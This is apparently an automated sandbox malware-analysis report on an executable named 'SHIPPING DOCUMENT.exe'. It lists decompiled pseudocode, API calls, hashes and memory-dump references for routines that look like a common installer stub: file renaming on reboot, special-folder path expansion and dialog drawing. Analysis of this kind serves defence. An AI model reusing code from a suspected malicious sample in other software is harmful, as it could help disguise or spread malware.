                                            0x0040447e
                                            0x00404483
                                            0x00404486
                                            0x0040448b
                                            0x004044a2
                                            0x004044a9
                                            0x004044bc
                                            0x004044bf
                                            0x004044d4
                                            0x004044db
                                            0x004044e0
                                            0x004044e5
                                            0x004044e5
                                            0x004044f4
                                            0x00404503
                                            0x00404515
                                            0x0040451a
                                            0x0040452a
                                            0x0040452c
                                            0x00000000
                                            0x00404532

                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044A2
                                            • GetDlgItem.USER32 ref: 004044B6
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044D4
                                            • GetSysColor.USER32(?), ref: 004044E5
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004044F4
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404503
                                            • lstrlenA.KERNEL32(?), ref: 00404506
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404515
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040452A
                                            • GetDlgItem.USER32 ref: 0040458C
                                            • SendMessageA.USER32(00000000), ref: 0040458F
                                            • GetDlgItem.USER32 ref: 004045BA
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004045FA
                                            • LoadCursorA.USER32 ref: 00404609
                                            • SetCursor.USER32(00000000), ref: 00404612
                                            • LoadCursorA.USER32 ref: 00404628
                                            • SetCursor.USER32(00000000), ref: 0040462B
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404657
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040466B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: N$6B
                                            • API String ID: 3103080414-649610290
                                            • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                            • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                            • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                            • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                            0x00405e97
                                            0x00405ea0
                                            0x00405ea7
                                            0x00405ebb
                                            0x00405ee3
                                            0x00405eea
                                            0x00405eee
                                            0x00405ef2
                                            0x00405f12
                                            0x00405f19
                                            0x00405f23
                                            0x00405f30
                                            0x00405f35
                                            0x00405f3a
                                            0x00405f3e
                                            0x00405f4d
                                            0x00405f4f
                                            0x00405f5c
                                            0x00405f60
                                            0x00405ffb
                                            0x00000000
                                            0x00405f76
                                            0x00405f83
                                            0x00405fa7
                                            0x00405fab
                                            0x00405fca
                                            0x00405fce
                                            0x00405fce
                                            0x00405fd0
                                            0x00405fd9
                                            0x00405fe4
                                            0x00405fef
                                            0x00405ff5
                                            0x00000000
                                            0x00405ff5
                                            0x00405fad
                                            0x00405fb0
                                            0x00405fbb
                                            0x00405fb7
                                            0x00405fb9
                                            0x00405fba
                                            0x00405fba
                                            0x00405fc2
                                            0x00405fc4
                                            0x00000000
                                            0x00405fc4
                                            0x00405f8e
                                            0x00405f94
                                            0x00000000
                                            0x00405f94
                                            0x00405f60
                                            0x00405f3e
                                            0x00405ebd
                                            0x00405ec8
                                            0x00405ed1
                                            0x00405ed5
                                            0x00000000
                                            0x00000000
                                            0x00405ed5
                                            0x00406006

                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406028,?,?), ref: 00405EC8
                                            • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 00405ED1
                                              • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                              • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                            • GetShortPathNameA.KERNEL32(?,00422EE0,00000400), ref: 00405EEE
                                            • wsprintfA.USER32 ref: 00405F0C
                                            • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                            • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                            • GlobalFree.KERNEL32 ref: 00405FF5
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405FFC
                                              • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00405DC5
                                              • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]$*B$.B$.B
                                            • API String ID: 2171350718-3836630945
                                            • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                            • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                            • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                            • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                            0x0040100a
                                            0x00401039
                                            0x00401047
                                            0x0040104d
                                            0x00401051
                                            0x0040105b
                                            0x00401061
                                            0x00401064
                                            0x004010f3
                                            0x00401089
                                            0x0040108c
                                            0x004010a6
                                            0x004010bd
                                            0x004010cc
                                            0x004010cf
                                            0x004010d5
                                            0x004010d9
                                            0x004010e4
                                            0x004010ed
                                            0x004010ef
                                            0x004010ef
                                            0x00401100
                                            0x00401105
                                            0x0040110d
                                            0x00401110
                                            0x00401112
                                            0x00401118
                                            0x0040111f
                                            0x00401126
                                            0x00401130
                                            0x00401142
                                            0x00401156
                                            0x00401160
                                            0x00401165
                                            0x00401165
                                            0x00401110
                                            0x0040116e
                                            0x00000000
                                            0x00401178
                                            0x00401010
                                            0x00401013
                                            0x00401015
                                            0x0040101f
                                            0x0040101f
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32 ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32 ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                            • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                            • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                            • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x77c7ec
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}



























                                            0x004062bb
                                            0x004062bb
                                            0x004062bb
                                            0x004062c1
                                            0x004062c6
                                            0x004062c8
                                            0x004062d7
                                            0x004062d7
                                            0x004062df
                                            0x004062e0
                                            0x004062e1
                                            0x004062e2
                                            0x004062e5
                                            0x004062ed
                                            0x004062ef
                                            0x00406306
                                            0x00406309
                                            0x00406309
                                            0x004064e0
                                            0x004064e0
                                            0x004064e4
                                            0x00000000
                                            0x00000000
                                            0x00406316
                                            0x0040631c
                                            0x00000000
                                            0x00000000
                                            0x00406322
                                            0x00406323
                                            0x00406326
                                            0x00406329
                                            0x004064d3
                                            0x004064dd
                                            0x004064df
                                            0x004064df
                                            0x004064d5
                                            0x004064d7
                                            0x004064d9
                                            0x004064da
                                            0x004064da
                                            0x00000000
                                            0x004064d3
                                            0x0040632f
                                            0x00406333
                                            0x00406343
                                            0x0040634a
                                            0x0040634d
                                            0x00406355
                                            0x00406358
                                            0x0040635f
                                            0x00406360
                                            0x00406363
                                            0x00406480
                                            0x00406483
                                            0x004064b3
                                            0x004064b6
                                            0x004064bb
                                            0x004064bf
                                            0x004064bf
                                            0x004064c4
                                            0x004064ca
                                            0x004064cc
                                            0x00000000
                                            0x004064cc
                                            0x00406485
                                            0x00406488
                                            0x0040649d
                                            0x004064a4
                                            0x0040648a
                                            0x00406491
                                            0x00406491
                                            0x004064ac
                                            0x004064af
                                            0x00406478
                                            0x00406479
                                            0x00406479
                                            0x00000000
                                            0x004064af
                                            0x00406369
                                            0x00406370
                                            0x00406372
                                            0x00406373
                                            0x0040638d
                                            0x0040638d
                                            0x00406394
                                            0x00406394
                                            0x0040639b
                                            0x0040639f
                                            0x0040639f
                                            0x004063a0
                                            0x004063a2
                                            0x004063db
                                            0x004063de
                                            0x004063ee
                                            0x004063f1
                                            0x004063f9
                                            0x004063ff
                                            0x004063ff
                                            0x0040645e
                                            0x0040645e
                                            0x00406460
                                            0x00000000
                                            0x00000000
                                            0x00406403
                                            0x0040640a
                                            0x0040640b
                                            0x0040640d
                                            0x00406427
                                            0x00406435
                                            0x0040643b
                                            0x0040643d
                                            0x0040645b
                                            0x0040645b
                                            0x0040645b
                                            0x00000000
                                            0x0040645b
                                            0x00406443
                                            0x0040644c
                                            0x0040644f
                                            0x00406455
                                            0x00406459
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406459
                                            0x0040640f
                                            0x00406412
                                            0x00000000
                                            0x00000000
                                            0x00406421
                                            0x00406423
                                            0x00406425
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406425
                                            0x00000000
                                            0x0040645e
                                            0x004063e6
                                            0x00000000
                                            0x004063a4
                                            0x004063bf
                                            0x004063c4
                                            0x004063c7
                                            0x00406467
                                            0x00406467
                                            0x0040646b
                                            0x00406473
                                            0x00406473
                                            0x00000000
                                            0x0040646b
                                            0x004063d1
                                            0x00406462
                                            0x00406462
                                            0x00406465
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406465
                                            0x004063a2
                                            0x00406375
                                            0x00406379
                                            0x00000000
                                            0x00000000
                                            0x0040637b
                                            0x0040637f
                                            0x00000000
                                            0x00000000
                                            0x00406381
                                            0x00406385
                                            0x00000000
                                            0x00406387
                                            0x00406387
                                            0x00000000
                                            0x00406387
                                            0x00406385
                                            0x004064ea
                                            0x004064f4
                                            0x00406500
                                            0x00406500
                                            0x00000000

                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004063E6
                                            • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                            • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?,00420530,00000000,00405387,00420530,00000000), ref: 00406435
                                            • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                                            • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                            • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                            • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                            • API String ID: 717251189-2520582795
                                            • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                            • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                            • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                            • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                            0x00406505
                                            0x0040650d
                                            0x00406521
                                            0x00406521
                                            0x00406527
                                            0x00406534
                                            0x00406534
                                            0x00406535
                                            0x00406537
                                            0x0040653b
                                            0x0040653d
                                            0x00406546
                                            0x00406548
                                            0x00406562
                                            0x0040656a
                                            0x0040656a
                                            0x0040656f
                                            0x00406571
                                            0x00406573
                                            0x00406577
                                            0x00406578
                                            0x0040657b
                                            0x00406583
                                            0x00406585
                                            0x00406589
                                            0x00000000
                                            0x00000000
                                            0x0040658f
                                            0x00406594
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406594
                                            0x00406599

                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                            • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                            • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
                                            • "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" , xrefs: 0040653F
                                            • *?|<>/":, xrefs: 0040654B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
